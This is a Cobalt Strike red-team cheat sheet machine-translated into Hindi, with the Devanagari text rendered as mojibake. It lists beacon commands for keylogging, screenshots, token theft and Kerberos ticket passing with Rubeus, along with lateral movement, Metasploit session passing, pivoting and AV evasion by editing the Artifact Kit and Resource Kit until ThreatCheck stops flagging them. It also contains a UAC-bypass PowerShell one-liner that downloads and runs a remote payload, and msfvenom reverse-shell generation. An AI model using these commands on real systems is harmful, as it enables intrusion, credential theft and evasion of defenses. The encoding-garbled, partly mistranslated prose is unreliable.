рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛
рд╕реА2 рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛
Cobalt Strike -> рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛ -> рдЬреЛрдбрд╝реЗрдВ/рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
рдлрд┐рд░ рдЖрдк рдХрд╣рд╛рдВ рд╕реБрдирдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдХрд┐рд╕ рдкреНрд░рдХрд╛рд░ рдХреЗ рдмреАрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ (http, dns, smb...) рдФрд░ рдЕрдзрд┐рдХ рдХрд╛ рдЪрдпрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдкреАрдпрд░2рдкреАрдпрд░ рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛
рдЗрди рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдмреАрдХрдиреЛрдВ рдХреЛ рд╕реА2 рдХреЗ рд╕рд╛рде рд╕реАрдзреЗ рдмрд╛рддрдЪреАрдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реЛрддреА рд╣реИ, рд╡реЗ рдЗрд╕рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЗрд╕рд╕реЗ рд╕рдВрд╡рд╛рдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
Cobalt Strike -> рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛ -> рдЬреЛрдбрд╝реЗрдВ/рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
рдлрд┐рд░ рдЖрдкрдХреЛ TCP рдпрд╛ SMB рдмреАрдХрди рдХрд╛ рдЪрдпрди рдХрд░рдирд╛ рд╣реЛрдЧрд╛
TCP рдмреАрдХрди рдЪрдпрдирд┐рдд рдкреЛрд░реНрдЯ рдореЗрдВ рдПрдХ рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛ рд╕реЗрдЯ рдХрд░реЗрдЧрд╛ред рдПрдХ TCP рдмреАрдХрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рджреВрд╕рд░реЗ рдмреАрдХрди рд╕реЗ connect <ip> <port>
рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
smb рдмреАрдХрди рдЪрдпрдирд┐рдд рдирд╛рдо рдХреЗ рдкрд╛рдЗрдкрдореЗрдВ рд╕реБрдиреЗрдЧрд╛ред SMB рдмреАрдХрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ link [target] [pipe]
рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред
рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ рдФрд░ рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ
рдлрд╝рд╛рдЗрд▓реЛрдВ рдореЗрдВ рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ
рд╣рдорд▓реЗ -> рдкреИрдХреЗрдЬ ->
HTMLApplication
HTA рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рд▓рд┐рдП
MS Office Macro
рдореИрдХреНрд░реЛ рдХреЗ рд╕рд╛рде рдПрдХ рдСрдлрд╝рд┐рд╕ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХреЗ рд▓рд┐рдП
Windows Executable
.exe, .dll рдпрд╛ рд╕реЗрд╡рд╛ .exe рдХреЗ рд▓рд┐рдП
Windows Executable (S)
рдПрдХ stageless .exe, .dll рдпрд╛ рд╕реЗрд╡рд╛ .exe рдХреЗ рд▓рд┐рдП (рд╕реНрдЯреЗрдЬрд▓реЗрд╕ рд╕реНрдЯреЗрдЬреНрдб рд╕реЗ рдмреЗрд╣рддрд░ рд╣реИ, рдХрдо IoC)
рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ рдФрд░ рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ
рд╣рдорд▓реЗ -> рд╡реЗрдм рдбреНрд░рд╛рдЗрд╡-рдмрд╛рдИ -> рд╕реНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╡реЗрдм рд╡рд┐рддрд░рдг (S)
рдЗрд╕рд╕реЗ рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ/рдПрдХреНрд╕реАрдХреНрдпреВрдЯреЗрдмрд▓ рдЙрддреНрдкрдиреНрди рд╣реЛрдЧрд╛ рдЬреЛ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рд╕реЗ рдмреАрдХрди рдХреЛ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реЛрдЧрд╛, рдЬреИрд╕реЗ: bitsadmin, exe, powershell рдФрд░ python
рдкреЗрд▓реЛрдб рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ
рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдкреЗрд╢ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡реЗрдм рд╕рд░реНрд╡рд░ рдореЗрдВ рд░рдЦрдиреЗ рдХреА рдлрд╝рд╛рдЗрд▓ рд╣реИ, рддреЛ рдХреЗрд╡рд▓ рд╣рдорд▓реЗ -> рд╡реЗрдм рдбреНрд░рд╛рдЗрд╡-рдмрд╛рдИ -> рдлрд╝рд╛рдЗрд▓ рд╣реЛрд╕реНрдЯ
рдкрд░ рдЬрд╛рдПрдВ рдФрд░ рд╣реЛрд╕реНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ рдФрд░ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХрд░реЗрдВред
рдмреАрдХрди рд╡рд┐рдХрд▓реНрдк
# рд╕реНрдерд╛рдиреАрдп .NET рдмрд╛рдЗрдирд░реА рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
execute-assembly </path/to/executable.exe>
# рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ
printscreen # рдкреНрд░рд┐рдВрдЯрд╕реНрдХреНрд░реАрди рд╡рд┐рдзрд┐ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХрд▓ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрдВ
screenshot # рдПрдХрд▓ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрдВ
screenwatch # рдбреЗрд╕реНрдХрдЯреЙрдк рдХреЗ рдирд┐рдпрдорд┐рдд рдЕрдВрддрд░рд╛рд▓ рдкрд░ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрдВ
## рдЙрдиреНрд╣реЗрдВ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рд╡реНрдпреВ -> рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рдкрд░ рдЬрд╛рдПрдВ
# рдХреАрд▓реЙрдЧрд░
keylogger [pid] [x86|x64]
## рдХреБрдВрдЬреАрд╕реНрдкрд░реНрд╢ рдХреЛ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рд╡реНрдпреВ > рдХреАрд╕реНрдЯреНрд░реЛрдХреНрд╕ рдкрд░ рдЬрд╛рдПрдВ
# рдкреЛрд░реНрдЯрд╕реНрдХреИрди
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # рджреВрд╕рд░реЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдкреЛрд░реНрдЯрд╕реНрдХреИрди рдХреНрд░рд┐рдпрд╛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрдВ
portscan [targets] [ports] [arp|icmp|none] [max connections]
# рдкрд╛рд╡рд░рд╢реЗрд▓
# рдкрд╛рд╡рд░рд╢реЗрд▓ рдореЙрдбреНрдпреВрд▓ рдЖрдпрд╛рдд рдХрд░реЗрдВ
powershell-import C:\path\to\PowerView.ps1
powershell <рдпрд╣рд╛рдВ рдкрд╛рд╡рд░рд╢реЗрд▓ рдХрдорд╛рдВрдб рд▓рд┐рдЦреЗрдВ>
# рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрдХрд░рдг
## рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреЗ рд╕рд╛рде рдЯреЛрдХрди рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ
make_token [DOMAIN\user] [password] # рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдЕрдиреБрдХрд░рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЯреЛрдХрди рдмрдирд╛рдПрдВ
ls \\computer_name\c$ # рдПрдХ рдХрдВрдкреНрдпреВрдЯрд░ рдореЗрдВ C$ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдЙрддреНрдкрдиреНрди рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ
rev2self # make_token рдХреЗ рд╕рд╛рде рдЙрддреНрдкрдиреНрди рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдмрдВрдж рдХрд░реЗрдВ
## make_token рдХрд╛ рдЙрдкрдпреЛрдЧ рдИрд╡реЗрдВрдЯ 4624 рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИ: рдПрдХ рдЦрд╛рддрд╛ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рд▓реЙрдЧ рдСрди рд╣реБрдЖ рдерд╛ред рдпрд╣ рдИрд╡реЗрдВрдЯ рд╡рд┐рдВрдбреЛрдЬ рдбреЛрдореЗрди рдореЗрдВ рдмрд╣реБрдд рд╕рд╛рдорд╛рдиреНрдп рд╣реИ, рд▓реЗрдХрд┐рди рд▓реЙрдЧрдСрди рдкреНрд░рдХрд╛рд░ рдкрд░ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд░рдХреЗ рдЗрд╕реЗ рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЬреИрд╕рд╛ рдХрд┐ рдкрд╣рд▓реЗ рдХрд╣рд╛ рдЧрдпрд╛ рд╣реИ, рдЗрд╕рдореЗрдВ LOGON32_LOGON_NEW_CREDENTIALS рдХрд╛ рдЙрдкрдпреЛрдЧ рд╣реЛрддрд╛ рд╣реИ рдЬреЛ рдкреНрд░рдХрд╛рд░ 9 рд╣реИред
# UAC рдмрд╛рдИрдкрд╛рд╕
elevate svc-exe <рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛>
elevate uac-token-duplication <рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЯреЛрдХрди рдЪреБрд░рд╛ рд▓реЗрдВ
## make_token рдХреА рддрд░рд╣, рд▓реЗрдХрд┐рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ
## SYSTEM рд╕реЗ рдЯрд┐рдХрдЯ рдкрд╛рд╕ рдХрд░реЗрдВ
## рдЯрд┐рдХрдЯ рдХреЗ рд╕рд╛рде рдПрдХ рдирдпрд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## рдЙрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЯреЛрдХрди рдЪреБрд░рд╛рдПрдВ
steal_token <pid>
## рдЯрд┐рдХрдЯ + рдЯрд┐рдХрдЯ рдкрд╛рд╕ рдирд┐рдХрд╛рд▓реЗрдВ
### рдЯрд┐рдХрдЯ рд╕реВрдЪреА рдмрдирд╛рдПрдВ
execute-assembly C:\path\Rubeus.exe triage
### luid рджреНрд╡рд╛рд░рд╛ рджрд┐рд▓рдЪрд╕реНрдк рдЯрд┐рдХрдЯ рдбрдВрдк рдХрд░реЗрдВ
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
### рдирдИ рд▓реЙрдЧрдСрди рд╕рддреНрд░ рдмрдирд╛рдПрдВ, luid рдФрд░ processid рдХрд╛ рдзреНрдпрд╛рди рд░рдЦреЗрдВ
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### рдЙрддреНрдкрдиреНрди рд▓реЙрдЧрдСрди рд╕рддреНрд░ рдореЗрдВ рдЯрд┐рдХрдЯ рдбрд╛рд▓реЗрдВ
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### рдЕрдВрдд рдореЗрдВ, рдЙрд╕ рдирдИ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЯреЛрдХрди рдЪреБрд░рд╛рдПрдВ
steal_token <pid>
# рд▓реИрдЯрд░рд▓ рдореВрд╡рдореЗрдВрдЯ
## рдпрджрд┐ рдЯреЛрдХрди рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ рддреЛ рдЙрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛
jump [method] [target] [listener]
## рд╡рд┐рдзрд┐рдпрд╛рдБ:
## psexec x86 рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ EXE рдЖрд░реНрдЯрд┐рдлреИрдХреНрдЯ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
## psexec64 x64 рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ EXE рдЖрд░реНрдЯрд┐рдлреИрдХреНрдЯ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
##┬аpsexec_psh x86 рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ PowerShell рд╡рди-рд▓рд╛рдЗрдирд░ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
##┬аwinrm x86 WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ PowerShell рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдПрдВ
##┬аwinrm64 x64 WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ PowerShell рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдПрдВ
remote-exec [method] [target] [command]
## рд╡рд┐рдзрд┐рдпрд╛рдБ:
##┬аpsexec рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рдмрдВрдзрдХ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХреНрдЬреАрдХреНрдпреВрдЯ рдХрд░реЗрдВ
##┬аwinrm WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХреНрдЬреАрдХреНрдпреВрдЯ рдХрд░реЗрдВ (PowerShell)
##┬аwmi WMI рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХреНрдЬреАрдХреНрдпреВрдЯ рдХрд░реЗрдВ
## WMI рдХреЗ рд╕рд╛рде рдПрдХ рдмреАрдХрди рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рдпрд╣ рдЬрдВрдк рдХрдорд╛рдВрдб рдореЗрдВ рдирд╣реАрдВ рд╣реИ) рдмрд╕ рдмреАрдХрди рдЕрдкрд▓реЛрдб рдХрд░реЗрдВ рдФрд░ рдЗрд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
# Metasploit рдХреЛ рд╕рддреНрд░ рдкрд╛рд╕ рдХрд░реЗрдВ - рд▓рд┐рд╕реНрдЯрдирд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ
## Metaploit рд╣реЛрд╕реНрдЯ рдкрд░
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j
## Cobalt рдкрд░: Listeners > Add рдФрд░ Payload рдХреЛ Foreign HTTP рдкрд░ рд╕реЗрдЯ рдХрд░реЗрдВред Host рдХреЛ 10.10.5.120, Port рдХреЛ 8080 рд╕реЗрдЯ рдХрд░реЗрдВ рдФрд░ Save рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред
beacon> spawn metasploit
## рдЖрдк рдХреЗрд╡рд▓ рд╡рд┐рджреЗрд╢реА рд▓рд┐рд╕реНрдЯрдирд░ рдХреЗ рд╕рд╛рде x86 Meterpreter рд╕рддреНрд░ рдЙрддреНрдкрдиреНрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
# Metasploit рд╕рддреНрд░ рдХреЛ cobalt strike рдХреЛ рдкрд╛рд╕ рдХрд░реЗрдВ - рд╢реЗрд▓рдХреЛрдб рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ
## Metasploit рд╣реЛрд╕реНрдЯ рдкрд░
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
## msfvenom рдЪрд▓рд╛рдПрдВ рдФрд░ multi/handler рд▓рд┐рд╕реНрдЯрдирд░ рдХреЛ рддреИрдпрд╛рд░ рдХрд░реЗрдВ
## рдмрд┐рди рдлрд╝рд╛рдЗрд▓ рдХреЛ cobalt strike рд╣реЛрд╕реНрдЯ рдореЗрдВ рдХреЙрдкреА рдХрд░реЗрдВ
ps
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
# Metasploit рд╕рддреНрд░ рдХреЛ cobalt strike рдХреЛ рдкрд╛рд╕ рдХрд░реЗрдВ
## рдирд┐рд░реНрдорд┐рдд Beacon рд╢реЗрд▓рдХреЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ, Attacks > Packages > Windows Executable (S) рдкрд░ рдЬрд╛рдПрдВ, рд╡рд╛рдВрдЫрд┐рдд рд▓рд┐рд╕реНрдЯрдирд░ рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ, рдЖрдЙрдЯрдкреБрдЯ рдкреНрд░рдХрд╛рд░ рдХреЗ рд░реВрдк рдореЗрдВ Raw рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ рдФрд░ Use x64 payload рдХрд╛ рдЪрдпрди рдХрд░реЗрдВред
## Metasploit рдореЗрдВ post/windows/manage/shellcode_inject рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдЬрд┐рд╕рд╕реЗ рдЙрддреНрдкрдиреНрди рдХрд┐рдпрд╛ рдЧрдпрд╛ cobalt srike shellcode рдЗрдВрдЬреЗрдХреНрдЯ рд╣реЛрддрд╛ рд╣реИ
# рдкрд┐рд╡рдЯрд┐рдВрдЧ
## рдЯреАрдорд╕рд░реНрд╡рд░ рдореЗрдВ рдПрдХ рд╕реЙрдХреНрд╕ рдкреНрд░реЙрдХреНрд╕реА рдЦреЛрд▓реЗрдВ
beacon> socks 1080
# SSH рдХрдиреЗрдХреНрд╢рди
beacon> ssh 10.10.17.12:22 username password
AVs рд╕реЗ рдмрдЪреЗрдВ
Artifact Kit
рдЖрдорддреМрд░ рдкрд░ /opt/cobaltstrike/artifact-kit
рдореЗрдВ рдЖрдкрдХреЛ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рджреНрд╡рд╛рд░рд╛ рдЙрддреНрдкрдиреНрди рдмрд╛рдЗрдирд░реА рдмреАрдХрди рдХреЗ рдХреЛрдб рдФрд░ рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд рдЯреЗрдореНрдкрд▓реЗрдЯ (/src-common
рдореЗрдВ) рдорд┐рд▓реЗрдВрдЧреЗред
ThreatCheck рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрддреНрдкрдиреНрди рдмреИрдХрдбреЛрд░ (рдпрд╛ рдХреЗрд╡рд▓ рдХрдВрдкрд╛рдЗрд▓ рдХрд┐рдП рдЧрдП рдЯреЗрдореНрдкрд▓реЗрдЯ) рдХреЗ рд╕рд╛рде рдХрд░рдХреЗ рдЖрдк рдпрд╣ рдЬрд╛рдВрдЪ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдбрд┐рдлреЗрдВрдбрд░ рдХреЛ рдХреНрдпрд╛ рдЯреНрд░рд┐рдЧрд░ рдХрд░ рд░рд╣рд╛ рд╣реИред рдЖрдорддреМрд░ рдкрд░ рдпрд╣ рдПрдХ рд╕реНрдЯреНрд░рд┐рдВрдЧ рд╣реЛрддреА рд╣реИред рдЗрд╕рд▓рд┐рдП рдЖрдк рдмреИрдХрдбреЛрд░ рдЙрддреНрдкрдиреНрди рдХрд░ рд░рд╣реЗ рдХреЛрдб рдореЗрдВ рдЙрд╕ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдХреЛ рдирд╣реАрдВ рджрд┐рдЦрдиреЗ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдХреЛрдб рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж рдЙрд╕реА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ ./build.sh
рдЪрд▓рд╛рдПрдВ рдФрд░ dist-pipe/
рдлрд╝реЛрд▓реНрдбрд░ рдХреЛ Windows рдХреНрд▓рд╛рдЗрдВрдЯ рдореЗрдВ C:\Tools\cobaltstrike\ArtifactKit
рдореЗрдВ рдХреЙрдкреА рдХрд░реЗрдВред
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
рдпрд╣ рди рднреВрд▓реЗрдВ рдХрд┐ рдЖрдкрдХреЛ рд╡рд┐рдирд╛рд╢рдХрд╛рд░реА рд╕реНрдХреНрд░рд┐рдкреНрдЯ dist-pipe\artifact.cna
рд▓реЛрдб рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рддрд╛рдХрд┐ Cobalt Strike рдХреЛ рд╣рдорд╛рд░реЗ рджреНрд╡рд╛рд░рд╛ рдЪрдпрдирд┐рдд рдбрд┐рд╕реНрдХ рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд╣реАрдВ рдХрд░рдирд╛ рдкрдбрд╝реЗред
рд╕рдВрд╕рд╛рдзрди рдХрд┐рдЯ
рд╕рдВрд╕рд╛рдзрди рдХрд┐рдЯ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ Cobalt Strike рдХреЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ-рдЖрдзрд╛рд░рд┐рдд рдкреЗрд▓реЛрдб рдХреЗ рдЯреЗрдореНрдкрд▓реЗрдЯ рд╣реЛрддреЗ рд╣реИрдВ, рдЬрд┐рдирдореЗрдВ PowerShell, VBA рдФрд░ HTA рд╢рд╛рдорд┐рд▓ рд╣реИрдВред
рдЯреЗрдореНрдкрд▓реЗрдЯ рдХреЗ рд╕рд╛рде ThreatCheck рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрдк рдпрд╣ рдЬрд╛рди рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдбрд┐рдлрд╝реЗрдВрдбрд░ (рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ AMSI) рдХреЛ рдХреНрдпрд╛ рдкрд╕рдВрдж рдирд╣реАрдВ рд╣реИ рдФрд░ рдЙрд╕реЗ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
рдбрд┐рдЯреЗрдХреНрдЯ рдХреА рдЧрдИ рд▓рд╛рдЗрдиреЛрдВ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдХреЗ рдПрдХ рдЯреЗрдореНрдкрд▓реЗрдЯ рдмрдирд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдЬреЛ рдкрдХрдбрд╝рд╛ рдирд╣реАрдВ рдЬрд╛рдПрдЧрд╛ред
рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рдЖрдкрдХреЛ рдПрдЧреНрд░реЗрд╕рд┐рд╡ рд╕реНрдХреНрд░рд┐рдкреНрдЯ ResourceKit\resources.cna
рд▓реЛрдб рдХрд░рдирд╛ рдирд╣реАрдВ рднреВрд▓рдирд╛ рдЪрд╛рд╣рд┐рдП рддрд╛рдХрд┐ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рдХреЛ рдмрддрд╛рдпрд╛ рдЬрд╛ рд╕рдХреЗ рдХрд┐ рд╣рдореЗрдВ рдбрд┐рд╕реНрдХ рд╕реЗ рд░рд┐рд╕реЛрд░реНрд╕реЗрдЬрд╝ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╣реИ рдФрд░ рди рдХрд┐ рд▓реЛрдб рдХрд┐рдП рдЧрдП рд░рд┐рд╕реЛрд░реНрд╕реЗрдЬрд╝ред
cd C:\Tools\neo4j\bin
neo4j.bat console
http://localhost:7474/ --> Change password
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL
# Change powershell
C:\Tools\cobaltstrike\ResourceKit
template.x64.ps1
# Change $var_code -> $polop
# $x --> $ar
cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna
#artifact kit
cd C:\Tools\cobaltstrike\ArtifactKit
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
Last updated